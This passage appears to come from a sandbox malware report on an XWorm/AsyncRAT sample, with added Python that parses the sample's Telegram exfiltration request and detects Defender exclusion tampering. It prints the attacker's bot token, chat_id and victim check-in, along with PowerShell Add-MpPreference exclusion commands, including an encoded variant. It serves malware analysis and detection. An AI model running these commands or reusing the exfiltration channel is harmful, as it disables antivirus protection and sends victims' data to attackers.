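The check-in above is a plain Telegram Bot API call: the bot token sits in the URL path, the operator's chat_id and the URL-encoded victim summary sit in the query string, and the only thing that hides it from a proxy is the TLS to api.telegram.org. The Python below is an added example, not code from the report or from XWorm: it reconstructs the request from the flattened HTTP line in the Networking section (the header line breaks are an assumption), decodes the text parameter, and returns the bot id, token, chat id and the victim fields so an analyst can see exactly what was exfiltrated. Note that the message banner says "XWorm V5.2" while the Groub field and the extracted configuration say "XWorm V5.6", so the banner is not a reliable version indicator.

```python
"""Parse an XWorm Telegram Bot API check-in (added example, not sandbox code)."""
import re
from urllib.parse import parse_qs, urlsplit

# Reconstructed from the report's flattened HTTP line; CRLF header breaks assumed.
SAMPLE_REQUEST = (
    "GET /bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage"
    "?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet"
    "%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName"
    "%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error"
    "%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6"
    " HTTP/1.1\r\nHost: api.telegram.org\r\nConnection: Keep-Alive\r\n\r\n"
)

# /bot<numeric id>:<token>/<api method>
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)$")
# "Key : Value" lines of the check-in body (keys are alphabetic words)
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?)\s*:\s*(.*?)\s*$")
BANNER_RE = re.compile(r"\[XWorm V([\d.]+)\]")


def parse_fields(text):
    """Turn the decoded message body into a dict. A key with an empty value
    (here 'New Clinet') takes the next bare line as its value; the first
    line without a key is kept as the banner."""
    fields, pending = {}, None
    for line in text.replace("\r\n", "\n").split("\n"):
        if not line.strip():
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2)
            fields[key] = value
            pending = key if not value else None
        elif pending:
            fields[pending], pending = line.strip(), None
        else:
            fields.setdefault("banner", line.strip())
    return fields


def parse_telegram_checkin(raw):
    """Return bot id, token, chat id, API method and victim fields for a Bot API
    request, or None if the request is not one (wrong host or path shape)."""
    request_line, _, rest = raw.partition("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = dict(h.split(": ", 1) for h in rest.split("\r\n") if ": " in h)
    if headers.get("Host", "").lower() != "api.telegram.org":
        return None
    parts = urlsplit(target)
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        return None
    query = parse_qs(parts.query)  # percent-decodes, including the UTF-8 skull
    fields = parse_fields(query.get("text", [""])[0])
    banner = BANNER_RE.search(fields.get("banner", ""))
    return {
        "http_method": method,
        "bot_id": m.group(1),
        "bot_token": m.group(2),
        "api_method": m.group(3),
        "chat_id": query.get("chat_id", [None])[0],
        "banner_version": banner.group(1) if banner else None,
        "fields": fields,
    }


if __name__ == "__main__":
    result = parse_telegram_checkin(SAMPLE_REQUEST)
    print("bot", result["bot_id"], "chat", result["chat_id"], "banner", result["banner_version"])
    for key, value in result["fields"].items():
        print(f"  {key}: {value}")
```

The bot id and chat id are the durable indicators: the token can be rotated by the operator, but a new build that reports to the same chat keeps the same chat_id. The same parser applies to `sendDocument` and other Bot API methods, since only the path tail and the query keys change.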

                          Operating System Destruction

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Process information set: 01 00 00 00 (the BreakOnTermination flag named in the signature list; with it set, killing the process bugchecks the machine, which is why the sandbox files it under OS destruction)

                          System Summary

                          barindex
                          Source: 9RgE5uOJwX.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeCode function: 0_2_00007FFD343D69360_2_00007FFD343D6936
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeCode function: 0_2_00007FFD343D76E20_2_00007FFD343D76E2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3440947D2_2_00007FFD3440947D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344084F32_2_00007FFD344084F3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3440B9FA2_2_00007FFD3440B9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344025FD2_2_00007FFD344025FD
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344027932_2_00007FFD34402793
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34405C432_2_00007FFD34405C43
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3440BBFB2_2_00007FFD3440BBFB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34403FFA2_2_00007FFD34403FFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34405BFA2_2_00007FFD34405BFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343EB9FA5_2_00007FFD343EB9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E0E635_2_00007FFD343E0E63
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E5EFA5_2_00007FFD343E5EFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E9EFB5_2_00007FFD343E9EFB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E26F55_2_00007FFD343E26F5
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343EB7FC5_2_00007FFD343EB7FC
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343EABF25_2_00007FFD343EABF2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD343DB9FA8_2_00007FFD343DB9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD343D26D38_2_00007FFD343D26D3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD343DBBFB8_2_00007FFD343DBBFB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343DB9FA11_2_00007FFD343DB9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343D26D311_2_00007FFD343D26D3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343D2A6D11_2_00007FFD343D2A6D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343DB7FC11_2_00007FFD343DB7FC
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343DABF211_2_00007FFD343DABF2
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeCode function: 13_2_00007FFD34400EFA13_2_00007FFD34400EFA
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeCode function: 14_2_00007FFD343E0EFA14_2_00007FFD343E0EFA
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3411654159.0000000013049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
                          Source: 9RgE5uOJwX.exe, 00000000.00000000.2129779866.0000000000D13000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
                          Source: 9RgE5uOJwX.exeBinary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
                          Source: 9RgE5uOJwX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9RgE5uOJwX.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9RgE5uOJwX.exe, xEidHkjl3ZbqUKvIPhMdYvEBT.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, xEidHkjl3ZbqUKvIPhMdYvEBT.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, xEidHkjl3ZbqUKvIPhMdYvEBT.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9RgE5uOJwX.exe, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs | Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
Source: MicrosoftClient.exe.0.dr, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs | Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs | Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@15/19@2/2
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | File created: C:\Users\user\AppData\Local\MicrosoftClient.exe
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Mutant created: \Sessions\1\BaseNamedObjects\5mzBrJAeAQUAJ7jq
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxaurn3.kw0.ps1
Source: 9RgE5uOJwX.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 9RgE5uOJwX.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 9RgE5uOJwX.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | File read: C:\Users\user\Desktop\9RgE5uOJwX.exe
Source: unknown | Process created: C:\Users\user\Desktop\9RgE5uOJwX.exe "C:\Users\user\Desktop\9RgE5uOJwX.exe"
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\MicrosoftClient.exe "C:\Users\user\AppData\Local\MicrosoftClient.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\MicrosoftClient.exe "C:\Users\user\AppData\Local\MicrosoftClient.exe"
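The four powershell.exe launches above are the part of this report a detection engineer would key on: the sample adds itself and its dropped copy to the Defender exclusion list, once by path and once by process name, with -ExecutionPolicy Bypass. The following Python detector is an added example, not code from the Joe Sandbox report or from the sample. It runs over process-creation events constructed from the command lines shown above (the parent/image/cmdline field names are an assumed event shape), and goes beyond the report in two constructed extras: an -EncodedCommand variant of the same exclusion, and a benign Get-MpPreference call that must not alert. It also accepts PowerShell's unambiguous parameter prefixes (-ExclusionPa binds -ExclusionPath), which a naive string match on the full parameter name would miss.

```python
"""Flag Defender-exclusion tampering (Add-/Set-MpPreference) in process-creation events."""
import base64
import re
from dataclasses import dataclass

# PowerShell binds parameters case-insensitively and by unambiguous prefix,
# so '-ExclusionPa' binds -ExclusionPath; the pattern tolerates any such prefix.
_CMDLET_RE = re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b")
_EXCL_RE = re.compile(
    r"""(?i)-Exclusion(Pa[a-z]*|Pr[a-z]*|E[a-z]*|I[a-z]*)\s+(['"]?)(.+?)\2(?=\s|$)"""
)
_BYPASS_RE = re.compile(r"(?i)-(?:ExecutionPolicy|exec|ex|ep)\s+Bypass")
_ENC_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


@dataclass
class Finding:
    parent: str
    cmdlet: str
    kind: str      # Path, Process, Extension or IpAddress
    value: str
    bypass: bool   # launched with -ExecutionPolicy Bypass
    encoded: bool  # exclusion was hidden behind -EncodedCommand


def encode_powershell_command(script: str) -> str:
    """Base64 over UTF-16LE, the encoding -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _expand_encoded(cmdline: str):
    """Append the decoded -EncodedCommand payload, if any, so later patterns see it."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return cmdline, False
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline, False
    return cmdline + " " + decoded, True


def _canonical(param: str) -> str:
    """Map a (possibly abbreviated) -Exclusion* parameter to its full name."""
    p = param.lower()
    if p.startswith("pa"):
        return "Path"
    if p.startswith("pr"):
        return "Process"
    if p.startswith("e"):
        return "Extension"
    return "IpAddress"


def detect(events):
    """Return one Finding per exclusion added by a MpPreference cmdlet."""
    findings = []
    for ev in events:
        cmd, encoded = _expand_encoded(ev["cmdline"])
        cm = _CMDLET_RE.search(cmd)
        if not cm:
            continue
        bypass = _BYPASS_RE.search(cmd) is not None
        for m in _EXCL_RE.finditer(cmd):
            findings.append(Finding(ev["parent"], cm.group(0), _canonical(m.group(1)),
                                    m.group(3), bypass, encoded))
    return findings


_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_SAMPLE = r"C:\Users\user\Desktop\9RgE5uOJwX.exe"
_DROPPED = r"C:\Users\user\AppData\Local\MicrosoftClient.exe"


def _ps(args: str) -> str:
    return f'"{_PS}" {args}'


# Constructed events in an assumed parent/image/cmdline shape. The first four reproduce
# the command lines from this report; the last two are constructed extras.
SAMPLE_EVENTS = [
    {"parent": _SAMPLE, "image": _PS,
     "cmdline": _ps(f"-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '{_SAMPLE}'")},
    {"parent": _SAMPLE, "image": _PS,
     "cmdline": _ps("-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'")},
    {"parent": _SAMPLE, "image": _PS,
     "cmdline": _ps(f"-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '{_DROPPED}'")},
    {"parent": _SAMPLE, "image": _PS,
     "cmdline": _ps("-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'")},
    # Same exclusion hidden behind -EncodedCommand (constructed, not seen in the report).
    {"parent": _SAMPLE, "image": _PS,
     "cmdline": _ps("-NoProfile -enc " + encode_powershell_command(
         f"Add-MpPreference -ExclusionPath '{_DROPPED}'"))},
    # Benign baseline: an interactive admin reading the current preferences (constructed).
    {"parent": r"C:\Windows\explorer.exe", "image": _PS,
     "cmdline": _ps("-NoProfile -Command Get-MpPreference")},
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.cmdlet} {f.kind}={f.value!r} bypass={f.bypass} encoded={f.encoded} parent={f.parent}")
```

Two caveats for anyone turning this into a production rule. Add-MpPreference only succeeds from an elevated context, so a successful exclusion implies the parent already held administrator rights; an alert on the command line is still worth raising when the call fails, because the attempt itself is the signal. And command-line matching sees nothing if the exclusion is set through the MpPreference WMI class or a Group Policy registry write rather than PowerShell, so pair this with auditing of the Defender exclusion registry keys and the Defender operational log.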
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Section loaded (in load order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll,
    vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll,
    windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll,
    windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll,
    onecoreuapcommonproxystub.dll, wbemcomn.dll, amsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll,
    ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll,
    mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, avicap32.dll, msvfw32.dll, winmm.dll, winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in load order): atl.dll, mscoree.dll, kernel.appcore.dll,
    version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll,
    userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll,
    secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll,
    microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in load order): atl.dll, mscoree.dll, kernel.appcore.dll,
    version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll,
    msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll,
    sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll,
    microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in load order): atl.dll, mscoree.dll, kernel.appcore.dll,
    version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll,
    windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll,
    opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll,
    microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in load order): atl.dll, mscoree.dll, kernel.appcore.dll,
    version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll,
    windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll,
    uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Section loaded: cryptbase.dll
